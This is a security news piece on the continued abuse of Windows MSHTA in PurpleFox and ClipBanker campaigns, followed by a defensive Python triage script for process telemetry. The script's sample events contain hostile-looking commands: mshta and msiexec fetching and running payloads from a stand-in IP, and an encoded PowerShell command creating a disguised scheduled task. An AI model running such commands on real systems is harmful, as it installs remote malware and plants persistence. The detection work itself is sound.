A legacy Windows tool that refuses to die: Bitdefender’s findings suggest MSHTA remains attractive because it checks several boxes attackers like: it is Microsoft-signed, preinstalled on Windows, capable of in-memory execution, and still implicitly trusted in many environments.

Other sophisticated campaigns picked it up too. Bitdefender detailed PurpleFox using MSHTA to launch ‘msiexec’ commands that downloaded MSI payloads posing as PNG images from remote IP addresses. Once installed, PurpleFox operates as a rootkit-enabled backdoor capable of persistence, surveillance, information theft, and distributed denial-of-service (DDoS) activity.

Elsewhere, ClipBanker campaigns used HTA loaders to execute Base64-encoded PowerShell commands that established persistence through scheduled tasks posing as legitimate Windows services. The malware ultimately hijacked cryptocurrency wallet addresses copied to victims’ clipboards.

Bitdefender cautioned that not every MSHTA execution is inherently malicious. “A significant portion of detections came from the update mechanism of DriverPack, an older software package that downloads driver files from third-party sources rather than through official Microsoft update channels,” the researchers pointed out. Still, they argued the balance has clearly shifted toward abuse.
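The two chains described above (MSHTA spawning msiexec with a remote, image-named MSI, and an HTA loader running encoded PowerShell that registers a scheduled task) and the DriverPack caveat map directly onto process-creation telemetry. The following triage routine is an added example, not code from Bitdefender or the article: it works over constructed records shaped like Sysmon Event ID 1 (Image, CommandLine, ParentImage), decodes the PowerShell `-EncodedCommand` payload to inspect it, and allowlists an assumed DriverPack install path to show how the benign case is carved out. Every sample event, the IP addresses, the task name and the DriverPack path are assumptions made for the example.

```python
"""Triage of mshta.exe process-creation telemetry.

Added example, not code from Bitdefender or the article. Records mimic the
fields of Sysmon Event ID 1 (Image, CommandLine, ParentImage); every sample
event below is constructed, and the DriverPack path used for the allowlist is
an assumption, not a path taken from the research.
"""
import base64
import re
from dataclasses import dataclass

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_RE = re.compile(r"(?:-|/)(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)
PERSIST_RE = re.compile(r"schtasks|Register-ScheduledTask|New-ScheduledTask", re.IGNORECASE)
DISGUISE_RE = re.compile(r"\.(png|jpg|jpeg|gif|txt)(\?|$)", re.IGNORECASE)

# Parent-path fragments treated as benign. The article says DriverPack's updater
# drives mshta.exe legitimately; the fragment below is an assumed install path.
BENIGN_PARENT_FRAGMENTS = ("\\driverpack\\",)


@dataclass
class ProcEvent:
    image: str
    command_line: str
    parent_image: str


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def decode_encoded_command(cmdline):
    """Plaintext of a PowerShell -EncodedCommand payload (Base64 of UTF-16LE), or None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def triage(event):
    """Findings for one process-creation event; an empty list means nothing suspicious."""
    findings = []
    img, parent = basename(event.image), basename(event.parent_image)
    if img == "mshta.exe":
        if any(f in event.parent_image.lower() for f in BENIGN_PARENT_FRAGMENTS):
            return []  # allowlisted launcher; tune this list per environment
        if URL_RE.search(event.command_line):
            findings.append("mshta fetches its HTA from a remote URL")
        if re.search(r"\b(vbscript|javascript):", event.command_line, re.IGNORECASE):
            findings.append("mshta runs an inline script: URI (no file on disk)")
    if parent == "mshta.exe":
        if img == "msiexec.exe":
            m = URL_RE.search(event.command_line)
            if m:
                findings.append("mshta -> msiexec installs a package from " + m.group(0))
                if DISGUISE_RE.search(m.group(0)):
                    findings.append("MSI payload disguised with a non-MSI extension")
        elif img in ("powershell.exe", "pwsh.exe"):
            plain = decode_encoded_command(event.command_line)
            if plain is not None:
                findings.append("mshta -> powershell with a Base64-encoded command")
                if PERSIST_RE.search(plain):
                    findings.append("decoded command registers a scheduled task")
    return findings


# Constructed ClipBanker-style payload: a task name that mimics a Windows service.
SCHTASKS_CMD = 'schtasks /create /tn "WindowsUpdateSvc" /tr "C:\\Users\\Public\\svc.exe" /sc onlogon /f'
ENCODED_SCHTASKS = base64.b64encode(SCHTASKS_CMD.encode("utf-16-le")).decode("ascii")

# Constructed sample telemetry (documentation-range IP, assumed paths).
SAMPLE_EVENTS = [
    # PurpleFox-style: mshta pulls an HTA from a bare IP, then runs msiexec on a ".png".
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r"mshta.exe http://198.51.100.23/1.hta",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\msiexec.exe",
              r"msiexec.exe /i http://198.51.100.23/img/update.png /q",
              r"C:\Windows\System32\mshta.exe"),
    # ClipBanker-style: HTA loader runs encoded PowerShell that creates a task.
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -w hidden -enc " + ENCODED_SCHTASKS,
              r"C:\Windows\System32\mshta.exe"),
    # Benign: DriverPack's updater launching a local HTA (path is an assumption).
    ProcEvent(r"C:\Windows\System32\mshta.exe",
              r'mshta.exe "C:\Program Files\DriverPack\update.hta"',
              r"C:\Program Files\DriverPack\DriverPack.exe"),
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(basename(ev.image), "<-", basename(ev.parent_image), triage(ev) or "clean")
```

Note that the allowlist only suppresses the mshta.exe launch itself: a child msiexec.exe or powershell.exe spawned under the allowlisted mshta is still evaluated, so a compromised updater does not get a free pass for what it runs next.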
First seen on csoonline.com
Jump to article: www.csoonline.com/article/4173096/internet-explorer-may-be-dead-but-its-ghost-still-runs-malware.html

